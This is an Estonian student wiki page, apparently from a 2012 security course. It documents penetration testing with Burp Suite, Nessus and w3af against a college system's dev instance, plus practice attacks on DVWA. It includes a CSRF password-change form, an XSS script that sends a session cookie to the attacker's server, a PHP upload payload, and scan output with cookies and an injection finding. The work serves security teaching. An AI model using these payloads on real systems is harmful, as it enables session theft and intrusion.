Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filme&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploaditud&lt;br /&gt;
Sellises kohas võiks olla süsteem tehtud whitelisti põhimõttel, et lubatud oleks ainult .doc .docx .pdf taolised failid ja kõik ülejäänud keelatud.&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47028</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47028"/>
		<updated>2012-03-30T11:27:51Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Matise tegevus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
